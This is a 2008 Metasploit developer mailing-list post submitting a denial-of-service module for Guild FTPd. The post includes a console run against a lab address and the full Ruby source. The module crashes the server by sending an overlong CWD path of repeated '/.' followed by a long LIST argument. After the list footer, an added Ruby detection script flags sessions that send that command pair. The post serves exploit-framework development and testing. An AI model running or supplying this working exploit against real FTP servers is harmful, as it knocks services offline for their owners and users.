Hey guys,

I've attached a new DoS auxiliary module for Guild FTPd versions 0.999.8.11 and 0.999.14. It's based on the Python script from yesterday which says it works for these versions, but I've only been able to test it on the latter.

This module needs the patch I sent a few minutes ago fixing banner grabbing in Exploit::Remote::Ftp.

msf > use dos/windows/ftp/guildftp_cwdlist
msf auxiliary(guildftp_cwdlist) > set RHOST 192.168.10.2
RHOST => 192.168.10.2
msf auxiliary(guildftp_cwdlist) > set FTPUSER test
FTPUSER => test
msf auxiliary(guildftp_cwdlist) > set FTPPASS test
FTPPASS => test
msf auxiliary(guildftp_cwdlist) > run
[*] Connecting to FTP server 192.168.10.2:21...
[*] Connected to target FTP server.
[*] Authenticating as test with password test...
[*] Sending password...
[*] Sending commands...
[*] Auxiliary module execution completed
msf auxiliary(guildftp_cwdlist) > info

       Name: Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
    Version: 1

Provided by:
    Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  test             yes       Valid FTP password for username
  FTPUSER  test             yes       Valid FTP username
  RHOST    192.168.10.2     yes       The target address
  RPORT    21               yes       The target port

Description:
  Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap
  corruption. You need to have a valid login so you can run CWD and
  LIST.

Thanks,
Kris Katterjohn

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption',
      'Description'    => %q{
        Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable
        to heap corruption. You need to have a valid login
        so you can run CWD and LIST.
      },
      'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'        => MSF_LICENSE,
      'Version'        => '1',
      'References'     =>
        [
          [ 'URL', 'http://milw0rm.com/exploits/6738' ]
        ],
      'DisclosureDate' => 'Oct 12 2008'))

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
    ])
  end

  def run
    connect_login

    print_status("Sending commands...")

    # We want to try to wait for responses to these
    raw_send_recv("CWD #{'/.' * 124}\r\n")
    raw_send_recv("LIST #{'X' * 100}\r\n")

    disconnect
  end

end

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
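
Added example, not part of the original post or of the Metasploit module: a detection-side check that flags FTP sessions whose command stream matches the CWD-then-LIST sequence the module above sends. The log line format ("session-id COMMAND argument"), the function names and both length thresholds are assumptions chosen for illustration.

```ruby
# Assumed thresholds; the posted module sends 124 repetitions of "/." to CWD
# and a 100-byte argument to LIST, so both sit well above these values.
CWD_DOT_REPEATS = 64
LIST_ARG_LENGTH = 64

# True when the CWD argument consists only of "/." segments repeated many times.
def suspicious_cwd?(arg)
  arg.match?(%r{\A(?:/\.)+\z}) && arg.length / 2 >= CWD_DOT_REPEATS
end

# True when LIST carries an unusually long argument.
def suspicious_list?(arg)
  arg.length >= LIST_ARG_LENGTH
end

# Returns the ids of sessions where a suspicious CWD is followed by a
# suspicious LIST. Each line is "<session-id> <COMMAND> <argument>" (assumed format).
def flag_sessions(lines)
  pending = {}   # session id => was the most recent CWD suspicious?
  flagged = []
  lines.each do |line|
    sid, cmd, arg = line.chomp.split(' ', 3)
    next if sid.nil? || cmd.nil?
    arg ||= ''
    case cmd.upcase
    when 'CWD'
      pending[sid] = suspicious_cwd?(arg)
    when 'LIST'
      if pending[sid] && suspicious_list?(arg) && !flagged.include?(sid)
        flagged << sid
      end
    end
  end
  flagged
end

# Constructed sample log: s1 is ordinary use, s2 matches the module's
# command pair, s3 uses a short "/." path and a normal LIST.
SAMPLE_LOG = [
  "s1 USER test",
  "s1 CWD /pub/files",
  "s1 LIST",
  "s2 USER test",
  "s2 CWD #{'/.' * 124}",
  "s2 LIST #{'X' * 100}",
  "s3 CWD #{'/.' * 3}",
  "s3 LIST -la"
].freeze

puts flag_sessions(SAMPLE_LOG).inspect if __FILE__ == $PROGRAM_NAME
```

The same two predicates can run in an FTP-aware proxy or IDS preprocessor to reject the commands before they reach an unpatched server, instead of only flagging them after the fact.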